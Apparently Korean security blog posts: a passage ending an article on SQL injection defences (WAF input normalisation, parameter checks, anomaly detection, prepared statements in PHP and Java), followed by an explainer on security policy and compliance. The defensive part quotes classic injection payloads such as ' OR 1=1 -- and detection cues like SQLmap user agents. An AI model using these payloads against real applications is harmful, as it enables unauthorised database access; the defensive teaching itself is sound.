%27 OR 1%3d1 -- → ' OR 1=1 -- 로 정규화 후 차단

✔️ 3) 파라미터 무결성 체크

파라미터 형태가 평소와 다른 경우 차단
예: 숫자 파라미터에 문자열 삽입

/item?id=10 → 정상 /item?id=10' OR '1'='1 → 비정상 → 차단

✔️ 4) ML 기반 이상 행위 탐지

특정 IP에서 짧은 시간에 수백 개 SQL 시도
User-Agent가 SQLmap
Union select 반복 발생

→ 이상 행위로 판단해 자동 차단

5. 개발 단계에서의 방어 코드

✔️ Prepared Statement 예시 (PHP)

$stmt = $conn->prepare("SELECT * FROM users WHERE id=? AND pw=?"); $stmt->bind_param("ss", $id, $pw); $stmt->execute();

✔️ Java (Spring)

String sql = "SELECT * FROM users WHERE id = ? AND pw = ?"; jdbcTemplate.queryForObject(sql, new Object[]{id, pw}, rowMapper);

→ 입력값이 SQL로 해석되지 못함
→ SQL Injection 완전 차단

한 문장 요약

SQL Injection = 사용자가 입력한 값을 SQL 쿼리로 잘못 연결한 취약점을 이용해 DB를 조작하는 공격이며, WAF와 개발 보안이 함께 대응해야 완벽히 방어 가능하다.

[보안_GPT] 보안 정책·컴플라이언스(GRC)란?

isaacToast — Fri, 14 Nov 2025 10:52:52 +0900

보안 정책(Security Policy)·컴플라이언스(Compliance)는 기업이 지켜야 할 보안 규칙과 법·규제 요건을 체계화한 것을 말해.
쉽게 말하면 **“회사가 안전하게 운영되도록 지켜야 할 보안 규칙과 준수 기준”**이라고 보면 돼.

기술적인 장비 운영이나 관제와 달리, 정책·컴플라이언스는 ‘사람과 프로세스’를 관리하는 영역이야.

보안 정책(Security Policy)이란?

1️⃣ 목적

기업 자산(정보, 시스템, 데이터)을 보호
직원·파트너의 행동 규범 제시
보안 위협과 사고를 예방

2️⃣ 구성 요소

정보보호 정책: 기밀성, 무결성, 가용성 확보
계정/권한 정책: 사용자 계정 생성, 삭제, 권한 부여
네트워크/시스템 운영 정책: 패치, 백업, 로그 관리
물리 보안 정책: 출입 통제, 장비 관리, CCTV 운영
클라우드/애플리케이션 정책: 접근 제어, 데이터 암호화

3️⃣ 실무 활용

직원·파트너에게 정책 준수 교육
보안 장비 운영 기준과 연계
사고 발생 시 책임 소재 판단 기준 제공

⚖️ 컴플라이언스(Compliance)란?

1️⃣ 목적

법규·규제·표준 준수
외부 감사 대응
기업 신뢰 확보

2️⃣ 주요 기준

국내: ISMS-P, 개인정보보호법, 정보통신망법
국제: ISO 27001, NIST, GDPR, SOC2
산업별: 금융보안기준, HIPAA(헬스케어)

3️⃣ 실무 적용

보안 정책이 컴플라이언스를 충족하도록 설계
정기 점검·감사(Audit) 수행
미준수 항목 개선 계획 수립

보안 정책과 컴플라이언스 관계

구분보안 정책컴플라이언스

목적	내부 운영 기준 수립	법/규제 준수
범위	직원·시스템·데이터·장비	국가법, 산업표준, 국제표준
적용	내부 문서, SOP, 지침	감사, 인증, 보고
예시	비밀번호 정책, 백업 주기	ISMS-P 인증, GDPR 준수

한 문장 요약

보안 정책·컴플라이언스 = “기업이 안전하게 운영되도록 내부 규칙을 만들고, 법과 표준을 지켜 점검·감사하는 체계”